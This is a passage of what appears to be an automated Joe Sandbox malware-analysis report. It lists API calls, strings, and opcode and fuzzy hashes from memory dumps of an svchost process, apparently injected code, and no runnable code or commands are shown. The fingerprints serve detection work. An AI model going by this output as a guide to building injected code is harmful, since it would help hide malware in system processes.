                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 7de55e3907eeb61d84b2ec02f2a106e95853d66b6f36fb83176ce734d1449b23
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: EC11823170868481FEF8A7395A5E37D715A5BC47F0F644324A839277EAEE6AC5028F02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4ecf39c6d282c13922bf66bcab5b528d166167323d1dc1c22cdb0ae5698a6f63
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CA81D43160064186FFD0AB2AA94D3AD7B90ABC97C0F5C4425EA4877796EB7BC9458F03
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 95f3983436fef2e635cbbbb6f4cfe75cb904a5ec283e5a170f3328164d622b80
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: FE312731316A00E1EF92DB46A80875C3BA4B7A9BB0F590525DD2E2B390EF3AC145CB02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: b5a7c8e5866d3be681c7c72b6341fd08360724eb52cb5406520433ec029d227b
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: A6116D32310B4086E7E0DB56F84831DBEA0F789FE5F444224EA5E97794DF79C8148B41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: d5baf2fdec3915ccb6d5ba03a26523055d6eaf36c073b9562141c2a23a4540a2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 91115B36704B4182EF949B62F50826D7AB0FB8ABC5F440029EE8D27794EF3EC505CB06
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: d9bcf84c3bd1533dc594d755c904efc893949546bab9f2d4fefad5fd87b2f6ed
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 23D18776208B8882DBB0DB0AE49835E7BA0F3D8B84F540116EA8D57BA9DF7DC541CF41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 8cc78c2e0b9a0818aac4479415df311af9c6568ae4cde8b4077327d37afdd94e
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 2231B032701B5582FA94DF16E54876DBBA4FB85BC0F084020EE4867B55EF36C4A18B42
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: a51daef424c37a2d87d3f48ae78d9347c480c631925ac01d6e6589b89c5644b5
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: E611B13130468082FEF4A735965E33D36666BC97F0F500324A83667BDAEE6BC4018E02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 9a315eb257f643b679e19e597653428afdd5a9ed67b0f0b7c202793297a7241d
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: CB016931300A4082EB94DB52A84C35DBBA1F789BC0F884035EE4963755DF3EC989CB01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 0005ef61f3f4758259884e0c528835bf75180136e8c964115b40faba9de71eb2
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: AE012D75211B4482EFA4DB62E80D31D7BB0BB86B86F444428DE4D27754EF7EC1488F02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 92aa7bb9b2b6dfa6ad1a732484a25b6d845d725c4ad4245d6686fe6e64f0842d
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2D51BD32701640CEEF94DF15E84DB5D3BA6F3A4BA8F518124DA0767788EB76C981CB06
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1ab68a51141d201d9d3457faa14e522c8d132673c329719a63e2eaa97f42be49
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 4331DF32200680CAEB94DF12E84CB1D7BA5F3A4BE8F458014EE4727789DB3AC941CF06
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: f116469fb9c2a0e448e9d2de76ad660752bf9178b15ca800e2592a53e1aade34
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 93F03C7230464192EBA0CB21F88875D7F60F789BC8F888021DA4957958DA6EC68DCF05
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 8951257b2819e3fd8c3a1e414e7e6c4bb950c718772d34c177490584403dd16d
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: D7F01C75718B8482FA94CF53B91C11DBE65AB89FD0F089131EE4A67B18DF7DC4458B02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 3b089b17eef97f58e315832727781e6d96eaf58a468135795a3cb71de5b836e2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 19F06271211A0481EF50CF29E44C35D7F20EB867A5F940219DA6A571E4DF2EC544CB02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: e84d3f95ef50d0da7100aa3763a05495aa81dff1962d31d5224108d669eafd74
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EF02B632219B8486EBA0CB59E49875EB7A1F3D4794F204015EB8E97BA9DF7DC484CF01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 67d3c669d68eaeb62026641d81c2ba8ade1a21c8528e3319f6dd4d7c6ecb65f5
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: EE61EA36519B44C6EBA0DB15E54832EB7A0F3D8784F600115FA8E57BA8DB7EC580CF02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 951121f1d836c29066c475965dea384ba1a895c4e71a86b8b5a2b369afc9a8fb
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: FC117036A10A9131FAE4D568E85E36D3D516B783F8F280724AD76376F6CA2AC8414E03
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: aeaa6a3608324816b59301e751e5f347b5c67f5421315ed83d7c14011e8581c2
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 9711C232A12F1111FEE4152CE85E36DB9D06B58374F48A738AD7E277E6CA2AC8415E02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: eebbbc8525f68246a3b0a6a29bd4a3cb681badd0c78307970aab721f545df6c1
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 4861D372604640C2FAF9CB68E54C36EBAA2F785784F544425CA1A377A4DB37C885CF43
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 91175b491b7fc14e3f1a7658fd3bfdb3fb1216593f4870ebf483384664c1c76e
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 26619D33A00B84CAEB60DF65D48439D7BA1F398BACF084215EF4927B98DB39C595CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 893e4d8dc827b760fc59cebf5f18d00e76e891684a4649e14e6d9b3ac1800f38
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 2D51BF72100380CAEFB48F65958835D77A4F3D5BA5F188216EB8967BD5CB3AD490DF02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 24b885a40865372f2d4962931c6dd4c13311282acb065aa2b8f2b100d7f859d2
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: A251A032100380CAFBF48F25954839C77A0F355BA4F189216DB99A7BD5CB3AD490DF02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8bc6e4c2ed6fb3d0b116afd45bb950e03d86cb73ff22765c23392437f1fb0b44
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 8051DD327122009BFB94CF15E488F1C37A9F354B98F568168DA0A67788EB36D885CF07
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 6434e668c18de7f899a849f0e788a6f9301be5892d0fc4d1102cc1fdd749815e
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: A1319C32211740AAF794DF11E888F1D77A9F740B98F568018EE5B67788DB3AC945CB06
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 3076751dc3de790d1c224386df8ee1f4e5ab8c71f6f65ab3a3bed05673c9e6dc
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 88D10132B14A8089EB51CFB9D4483AC3FB1F754BD8F108216DE5DA7B99DA3AC446CB41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 8a01ecca636f93bdf911fe9301806ba74427497ad84442dbc2d131ee4094cafd
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: 9F115B76604A91D6E794DFA6A80814D7FA0FB8AFC5F084025EA4963716EE39C451CB41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: a659f95e0478c9a379e7c93a59f58379ea217171002cffd52b577c1c22c3c908
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 9391D032700A5085FBA0DF7594883AD3FA0F759B98F644109DE4A77A94DB7EC8C2CB02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 4e80524f35fcef7bad59f85813724d52d64db0f3f33ffe74409acc95bda1e77e
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: A4115A32710F018AEB90DF60E8583AC37B4F31A758F440E21EA6D537A4EB78C1988780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 97ea5c88fb40b65250efba85239deb6fe808c8ef7dc44d6fea174178200e4e45
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: E671B636200B8186EFB5DF25D8993AE77A4F3C9B84F550026DD0963B89DE36D685CB02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: e083ef4e6a99dc2faf5a08287110857988fabb0183ff147dc1fcf3667f8f1dd1
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 33618B33A05B848AFBA0DFA5D48439D77B0F398B98F044215EF4927B98DB3AD595CB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
